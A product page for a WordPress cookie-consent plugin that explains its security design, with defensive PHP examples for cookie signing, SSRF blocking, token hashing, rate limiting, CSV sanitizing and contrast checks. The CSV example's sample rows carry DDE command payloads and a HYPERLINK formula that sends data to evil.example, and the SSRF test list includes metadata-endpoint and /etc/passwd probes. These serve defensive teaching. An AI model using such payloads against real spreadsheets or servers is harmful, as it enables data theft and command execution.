Security-First Architecture | Consenta Cookie Consent

Security-First Architecture — Cookie Consent Built for Security

Consenta v1.7.0 introduces HMAC-SHA256 signatures for consent cookies, guards all outgoing HTTP calls against SSRF and hardens the entire plugin architecture against modern attack vectors.

14-day money-back · Cancel anytime · GDPR-compliant · Local in WordPress

HMAC-SHA256 cookie signature · SSRF protection · SHA-256 token hashing · WCAG AA contrast

Why is security so important in a consent plugin?

A cookie consent plugin runs on every single page of your website, processes personal data and writes cookies with legal significance. It is therefore a critical part of your infrastructure and a potential attack target. A forged consent cookie could record a consent that was never given and expose the site operator to GDPR violations. An SSRF vulnerability in an outgoing HTTP call could expose internal network resources. Consenta addresses these risks with a security-first architecture.

Security Features

Security Architecture in Detail

HMAC-SHA256 Consent Cookies

Consent cookies are signed with HMAC-SHA256, keyed with the WordPress AUTH_KEY. The signature is verified server-side with hash_equals(), so the comparison does not leak timing information. Cookies with a missing or invalid signature are rejected.
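
The following is an added example of the sign-and-verify pattern described here and in the FAQ below; it is not Consenta's code. It uses PHP's hash_hmac() and hash_equals(). Inside WordPress the key would be the AUTH_KEY constant; outside WordPress the script falls back to a constructed development secret so it can be run stand-alone. The cookie layout (base64url payload, a dot, then the hex MAC) is this example's own choice, not the plugin's format.

```php
<?php
// Added example, not Consenta's code: sign a consent cookie with HMAC-SHA256 and
// verify the MAC before trusting (or even decoding) the payload.
declare(strict_types=1);

// AUTH_KEY exists inside WordPress; the fallback is a constructed dev-only secret.
$secret = defined('AUTH_KEY') ? AUTH_KEY : 'constructed-dev-secret-do-not-use-in-production';

function b64url_encode(string $bin): string
{
    return rtrim(strtr(base64_encode($bin), '+/', '-_'), '=');
}

function b64url_decode(string $txt): string|false
{
    return base64_decode(strtr($txt, '-_', '+/'), true);
}

// Cookie format (this example's own): <base64url(JSON payload)>.<hex HMAC-SHA256>
function sign_consent(array $consent, string $secret): string
{
    $encoded = b64url_encode(json_encode($consent, JSON_THROW_ON_ERROR));
    return $encoded . '.' . hash_hmac('sha256', $encoded, $secret);
}

// Returns the consent array only when the MAC is valid; null for a missing,
// unsigned, malformed or tampered cookie. The MAC is checked before the payload
// is decoded, and hash_equals() keeps the comparison constant-time.
function verify_consent(?string $cookie, string $secret): ?array
{
    if ($cookie === null || substr_count($cookie, '.') !== 1) {
        return null;
    }
    [$encoded, $mac] = explode('.', $cookie, 2);
    if (!hash_equals(hash_hmac('sha256', $encoded, $secret), $mac)) {
        return null;
    }
    $json = b64url_decode($encoded);
    if ($json === false) {
        return null;
    }
    $consent = json_decode($json, true);
    return is_array($consent) ? $consent : null;
}

// Constructed visitor decision: statistics accepted, marketing declined.
$consent = ['v' => 1, 'ts' => 1718000000, 'statistics' => true, 'marketing' => false];
$cookie  = sign_consent($consent, $secret);
echo "valid cookie:        ", json_encode(verify_consent($cookie, $secret)), "\n";

// Attack 1: flip marketing to true but keep the original MAC.
$forged = $consent;
$forged['marketing'] = true;
$forgedEncoded = b64url_encode(json_encode($forged, JSON_THROW_ON_ERROR));
$tampered = $forgedEncoded . '.' . explode('.', $cookie)[1];
echo "tampered payload:    ", json_encode(verify_consent($tampered, $secret)), "\n";

// Attack 2: send the payload without any signature.
echo "unsigned cookie:     ", json_encode(verify_consent($forgedEncoded, $secret)), "\n";

// Attack 3: sign the forged payload with a guessed key.
echo "wrong key signature: ", json_encode(verify_consent(sign_consent($forged, 'guessed-key'), $secret)), "\n";
```

The MAC proves integrity and origin, not freshness: an old but validly signed cookie can be replayed, which is why the payload carries a timestamp that the server should also check against its own consent log and an expiry policy.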

SSRF Protection

All outgoing HTTP calls — webhooks, cookie scanner, geolocation — are secured by an SSRF guard. Private IP ranges, loopback addresses and internal network resources cannot be accessed.
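
An added example of such an SSRF guard, written for this page and not taken from Consenta: it validates a webhook or scanner target before the HTTP request is made, resolving the hostname and refusing the call if any answer is a private, loopback, link-local or otherwise reserved address. The target URLs are constructed; the hostname case needs working DNS.

```php
<?php
// Added example, not Consenta's code: validate an outgoing URL against SSRF.
declare(strict_types=1);

// Why not a plain string blocklist: "localhost", "127.1", a DNS name pointing at
// 10.0.0.5 or an IPv6 address all slip past it. filter_var() parses the address
// properly; NO_PRIV_RANGE covers 10/8, 172.16/12, 192.168/16 and fc00::/7,
// NO_RES_RANGE covers 0/8, 127/8, 169.254/16, 240/4, ::1, :: , ::ffff:0:0/96
// and fe80::/10.
function is_public_ip(string $ip): bool
{
    return filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE) !== false;
}

// Returns the resolved public addresses on success, or a reason string if the
// request must be refused. The caller should connect to one of the returned
// addresses (sending the original Host header) instead of re-resolving: a
// DNS-rebinding attacker can otherwise answer the check with a public record
// and the actual connection with 10.x. Redirect targets need the same check.
function ssrf_check(string $url): array|string
{
    $parts = parse_url($url);
    if ($parts === false || empty($parts['host'])) {
        return 'unparseable URL';
    }
    if (!in_array(strtolower($parts['scheme'] ?? ''), ['http', 'https'], true)) {
        return 'scheme not allowed: ' . ($parts['scheme'] ?? '(none)');
    }
    if (isset($parts['user']) || isset($parts['pass'])) {
        return 'credentials in URL not allowed';
    }
    $host = trim($parts['host'], '[]');   // strip IPv6 brackets

    // Literal IP address in the URL: check it directly.
    if (filter_var($host, FILTER_VALIDATE_IP) !== false) {
        return is_public_ip($host) ? [$host] : "non-public address: $host";
    }

    // Hostname: resolve A and AAAA records and check every single answer.
    $records = @dns_get_record($host, DNS_A | DNS_AAAA);
    if ($records === false || $records === []) {
        return "cannot resolve host: $host";
    }
    $ips = [];
    foreach ($records as $r) {
        $ip = $r['ip'] ?? $r['ipv6'] ?? null;
        if ($ip !== null) {
            $ips[] = $ip;
        }
    }
    if ($ips === []) {
        return "no address records for host: $host";
    }
    foreach ($ips as $ip) {
        if (!is_public_ip($ip)) {
            return "host $host resolves to non-public address $ip";
        }
    }
    return $ips;
}

// Constructed targets: one legitimate webhook host and typical SSRF probes.
$targets = [
    'https://example.com/webhook',               // public host, real DNS lookup
    'http://127.0.0.1:8080/admin',
    'http://[::1]/',
    'http://169.254.169.254/latest/meta-data/',  // cloud metadata endpoint
    'http://10.0.0.5/internal',
    'http://0x7f000001/',                        // hex 127.0.0.1: not a valid literal, not resolvable
    'file:///etc/passwd',
    'http://user:pw@example.com/',
];
foreach ($targets as $t) {
    $r = ssrf_check($t);
    printf("%-44s %s\n", $t, is_array($r) ? 'allowed -> ' . implode(', ', $r) : "blocked ($r)");
}
```

WordPress core ships the same kind of pre-request check in wp_http_validate_url(), used by wp_safe_remote_get(); like this example it validates before the request rather than pinning the resolved address, so the rebinding caveat above applies there too. The filter flags also leave a few ranges open (for instance 100.64.0.0/10 and multicast), which a stricter deployment would add explicitly.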

SHA-256 Token Hashing at Rest

API tokens and access keys are never stored in plain text. Only their SHA-256 hashes are stored in the database, so a database dump does not yield usable tokens.
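
An added example of token hashing at rest, not Consenta's code: a token is generated from a CSPRNG, only its SHA-256 digest is persisted, and later requests are checked with hash_equals(). The in-memory array standing in for the database and the cst_ token prefix are this example's own constructs.

```php
<?php
// Added example, not Consenta's code: issue API tokens, persist only SHA-256
// digests, and authenticate presented tokens against the stored digest.
declare(strict_types=1);

// An unsalted SHA-256 is adequate only because the token is 32 bytes from a
// CSPRNG: there is nothing to guess and no rainbow table covers 256 bits of
// entropy. Low-entropy secrets such as passwords need password_hash() instead.
function issue_token(array &$db, string $label): string
{
    $token = 'cst_' . bin2hex(random_bytes(32));       // shown to the caller once, never stored
    $db[hash('sha256', $token)] = ['label' => $label, 'created' => time()];
    return $token;
}

// Hash the presented token and compare it with every stored digest using
// hash_equals(). A leaked dump of $db reveals only digests, never tokens.
function authenticate(array $db, string $presented): ?array
{
    $digest = hash('sha256', $presented);
    foreach ($db as $storedDigest => $meta) {
        if (hash_equals((string) $storedDigest, $digest)) {
            return $meta;
        }
    }
    return null;
}

// Revocation only needs the digest, so the plaintext is never required again.
function revoke(array &$db, string $token): void
{
    unset($db[hash('sha256', $token)]);
}

$db    = [];                                   // constructed stand-in for the tokens table
$token = issue_token($db, 'ci-pipeline');
echo "token (shown once):      $token\n";
echo "what a DB dump contains: ", implode(', ', array_keys($db)), "\n";
echo "valid token:             ", json_encode(authenticate($db, $token)), "\n";
echo "wrong token:             ", json_encode(authenticate($db, 'cst_' . str_repeat('0', 64))), "\n";
revoke($db, $token);
echo "after revoke:            ", json_encode(authenticate($db, $token)), "\n";
```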

Rate Limiting

REST API endpoints and AJAX handlers are equipped with rate limiting. Brute-force attacks on consent endpoints and admin actions are detected and blocked.
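
An added example of endpoint rate limiting, not Consenta's code: a fixed-window limiter keyed by client IP and route. Counters live in an in-memory array here; in a WordPress plugin they would typically be persisted in transients or the object cache (an assumption about how one would deploy this, not a statement about Consenta). The route name and client addresses are constructed.

```php
<?php
// Added example, not Consenta's code: fixed-window rate limiter for REST/AJAX endpoints.
declare(strict_types=1);

final class RateLimiter
{
    /** @var array<string, array{count:int, window_start:int}> */
    private array $buckets = [];

    public function __construct(
        private int $limit,          // requests allowed per window
        private int $windowSeconds   // window length in seconds
    ) {}

    // True if the request may proceed, false if it must be answered with HTTP 429.
    // $now is injected so the behaviour can be exercised without waiting.
    public function allow(string $clientIp, string $route, int $now): bool
    {
        $key = $clientIp . '|' . $route;
        $b   = $this->buckets[$key] ?? ['count' => 0, 'window_start' => $now];

        if ($now - $b['window_start'] >= $this->windowSeconds) {
            $b = ['count' => 0, 'window_start' => $now];      // window expired: start a new one
        }
        if ($b['count'] >= $this->limit) {
            $this->buckets[$key] = $b;                         // over limit: keep state, reject
            return false;
        }
        $b['count']++;
        $this->buckets[$key] = $b;
        return true;
    }

    // Seconds until the client may retry, suitable for a Retry-After header.
    public function retryAfter(string $clientIp, string $route, int $now): int
    {
        $b = $this->buckets[$clientIp . '|' . $route] ?? null;
        return $b === null ? 0 : max(0, $b['window_start'] + $this->windowSeconds - $now);
    }
}

// Constructed traffic: 5 requests per minute allowed, an attacker fires 8 in 8 seconds.
$limiter = new RateLimiter(limit: 5, windowSeconds: 60);
$route   = 'consent-endpoint';                 // constructed route label
$t0      = 1718000000;
for ($i = 0; $i < 8; $i++) {
    $ok = $limiter->allow('203.0.113.7', $route, $t0 + $i);
    printf("t+%ds request %d: %s\n", $i, $i + 1,
        $ok ? 'allowed' : 'rejected, Retry-After ' . $limiter->retryAfter('203.0.113.7', $route, $t0 + $i));
}
// A different client is unaffected; the attacker is admitted again once the window has passed.
printf("other client at t+8s: %s\n", $limiter->allow('198.51.100.2', $route, $t0 + 8) ? 'allowed' : 'rejected');
printf("attacker at t+61s:    %s\n", $limiter->allow('203.0.113.7', $route, $t0 + 61) ? 'allowed' : 'rejected');
```

Two practical caveats: the client IP must be the real one, so X-Forwarded-For may only be trusted when it comes from a known reverse proxy; and a fixed window permits up to twice the limit across a window boundary, which a sliding-window or token-bucket variant avoids at the cost of a little more state.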

CSV Formula Injection Protection

CSV exports of consent data are protected against formula injection attacks. Cell contents are sanitized so that spreadsheet applications do not interpret exported cells as formulas, including DDE payloads that would execute shell commands on the person opening the file.
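
An added example of the sanitization step, not Consenta's code: cells that begin with a formula trigger character are prefixed with a single quote before fputcsv() handles the CSV quoting. The consent rows, including the attacker-controlled page field, are constructed; the payloads are the well-known DDE and HYPERLINK forms from public CSV-injection write-ups.

```php
<?php
// Added example, not Consenta's code: neutralise formula injection in a CSV export.
declare(strict_types=1);

// Spreadsheets treat a cell beginning with = + - @ as a formula; a leading tab or
// carriage return is a classic bypass of that check. A leading single quote makes
// the application display the content as text.
function csv_safe(string $value): string
{
    if ($value === '') {
        return $value;
    }
    return in_array($value[0], ['=', '+', '-', '@', "\t", "\r"], true) ? "'" . $value : $value;
}

// Builds the CSV in memory with every cell passed through csv_safe(); fputcsv()
// takes care of enclosing cells that contain separators, quotes or newlines.
function export_csv(array $header, array $rows): string
{
    $fh = fopen('php://memory', 'r+');
    fputcsv($fh, $header);
    foreach ($rows as $row) {
        fputcsv($fh, array_map(static fn($v) => csv_safe((string) $v), $row));
    }
    rewind($fh);
    $csv = stream_get_contents($fh);
    fclose($fh);
    return $csv;
}

// Constructed consent log. "page" is taken from the visitor's request, so it is
// attacker-controlled; rows 2 to 4 carry injection attempts.
$rows = [
    ['2024-06-10 09:12:01', '203.0.113.0',  'accepted', '/shop'],
    ['2024-06-10 09:13:44', '198.51.100.0', 'declined', '=cmd|\' /C calc\'!A0'],
    ['2024-06-10 09:15:02', '192.0.2.0',    'accepted', '-2+3+cmd|\' /C calc\'!A0'],
    ['2024-06-10 09:16:30', '192.0.2.0',    'partial',  "\t=HYPERLINK(\"http://evil.example/?\"&A1)"],
];
echo export_csv(['timestamp', 'ip', 'decision', 'page'], $rows);
```

Apply csv_safe() to free-text columns; a genuinely numeric column that may legitimately start with a minus sign should be emitted as a number instead, otherwise negative values pick up the quote prefix.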

XSS Hardening

No style attribute is output unsanitized. All output passes through wp_kses() or esc_html(), so dynamic content in the admin area and on the frontend is protected against cross-site scripting.

WCAG Contrast Enforcement

Consenta enforces WCAG AA-compliant contrast ratios for all UI elements of the consent banner. Customizations that would fall below the minimum contrast are prevented.
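
An added example of how such an enforcement check can be implemented, not Consenta's code: the WCAG 2.1 relative-luminance formula and contrast ratio, with customizations rejected below the AA thresholds of 4.5:1 for normal text and 3:1 for large text. The colour pairs are constructed.

```php
<?php
// Added example, not Consenta's code: compute the WCAG contrast ratio of a
// foreground/background pair and reject pairs below the AA minimum.
declare(strict_types=1);

// sRGB channel (0-255) to linear light, as defined in WCAG 2.1.
function channel_to_linear(int $c): float
{
    $s = $c / 255;
    return $s <= 0.03928 ? $s / 12.92 : (($s + 0.055) / 1.055) ** 2.4;
}

// Accepts #rgb or #rrggbb and returns relative luminance L in [0, 1].
function relative_luminance(string $hex): float
{
    if (!preg_match('/^#([0-9a-f]{3}|[0-9a-f]{6})$/i', $hex, $m)) {
        throw new InvalidArgumentException("not a hex colour: $hex");
    }
    $h = strlen($m[1]) === 3 ? preg_replace('/(.)/', '$1$1', $m[1]) : $m[1];
    [$r, $g, $b] = array_map('hexdec', str_split($h, 2));
    return 0.2126 * channel_to_linear($r) + 0.7152 * channel_to_linear($g) + 0.0722 * channel_to_linear($b);
}

// Contrast ratio (L1 + 0.05) / (L2 + 0.05), with the lighter colour as L1.
function contrast_ratio(string $fg, string $bg): float
{
    $l1 = relative_luminance($fg);
    $l2 = relative_luminance($bg);
    return (max($l1, $l2) + 0.05) / (min($l1, $l2) + 0.05);
}

// Enforcement hook for a live editor: null means the pair is acceptable,
// otherwise the reason to show the site owner.
function reject_if_low_contrast(string $fg, string $bg, bool $largeText = false): ?string
{
    $min   = $largeText ? 3.0 : 4.5;
    $ratio = contrast_ratio($fg, $bg);
    return $ratio >= $min ? null : sprintf('contrast %.2f:1 is below the WCAG AA minimum of %.1f:1', $ratio, $min);
}

// Constructed customisations: #767676 on white just passes AA (4.54:1),
// #777777 on white just fails (4.48:1), gold on white fails badly.
$pairs = [['#ffffff', '#000000'], ['#767676', '#ffffff'], ['#777777', '#ffffff'], ['#ffd700', '#ffffff']];
foreach ($pairs as [$fg, $bg]) {
    printf("%s on %s: %s\n", $fg, $bg, reject_if_low_contrast($fg, $bg) ?? 'ok');
}
```

Validating the colour format with a strict regex before use also keeps the value safe to emit inside a style attribute, since anything other than a hex colour is rejected before it reaches the output.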

ABSPATH Guards & hash_equals()

All PHP files are protected against direct access with ABSPATH guards. All token comparisons use hash_equals() for timing-attack-safe checks — no direct string comparison for security-critical operations.

Background

Why Security is Critical in Cookie Consent

Runs on every page

A consent plugin is executed on every single page request. A single security vulnerability can therefore affect the entire website.

Processes personal data

Consent data such as IP addresses, timestamps and user decisions are personal data under the GDPR. Their protection is not optional.

Cookies with legal significance

The consent cookie documents a legally binding consent. If it is manipulated, this can lead to invalid consents and thus to GDPR violations.

Pricing

Subscribe monthly or pay once.

Flash sale: Agency Lifetime for 149 € (regular price 499 €)
All Agency features, unlimited sites, no further costs.
Get Lifetime
Starter
3 €/month (cancel monthly, 1 WordPress site) or 27 €/year (2.25 €/mo, 3 months free)
  • 1 WordPress site
  • Consent dialog & banner
  • Cookie & script blocking
  • Cookie scanner
  • Google Consent Mode v2
  • IAB TCF 2.2
  • GPC signal (Do Not Sell)
  • Live editor (colors, logo)
  • Import/export
  • Browser API Blocking
  • Webhooks
  • Email support
Buy now

Cancel anytime

Agency (for agencies and freelancers)
12 €/month (cancel monthly, unlimited sites) or 108 €/year (9 €/mo, 3 months free)
  • Unlimited WordPress sites
  • Everything in Pro
  • Multi-site central dashboard
  • REST API access
  • Branded reports
  • Custom consent texts
  • Dedicated support
  • + White-Label Addon from 20 €/month · available separately
Start Agency

Cancel anytime · 14-day money back

FAQ

Questions about Security Architecture

How are consent cookies protected against tampering?
Consenta signs every consent cookie with real HMAC-SHA256 using the WordPress AUTH_KEY. On every page load the signature is verified server-side via hash_equals(). Cookies without a valid signature or with altered content are rejected.
What is SSRF and why is protection important?
SSRF (Server-Side Request Forgery) is an attack where an attacker causes a server to request internal network resources. Since Consenta makes HTTP calls for webhooks, the cookie scanner and geolocation, SSRF protection is essential. Consenta blocks all requests to private IP ranges and loopback addresses.
Are API tokens stored securely?
Yes. API tokens and access keys are stored exclusively as SHA-256 hashes in the database. The original token is not persisted after creation. Even with a complete database dump, no valid tokens can be extracted.
Is Consenta suitable for security audits?
Yes. Consenta follows WordPress Coding Standards, uses exclusively vetted cryptography primitives (HMAC-SHA256, SHA-256, hash_equals), protects all outputs against XSS and all inputs against injection. The plugin architecture is documented for security reviews.

Consent. Secure. From the ground up.

HMAC-SHA256 · SSRF Protection · Rate Limiting · XSS Hardening · WCAG AA · GDPR-compliant

Get started from 3 €/mo · All features

14-day money-back guarantee · Cancel anytime · Available in 30+ languages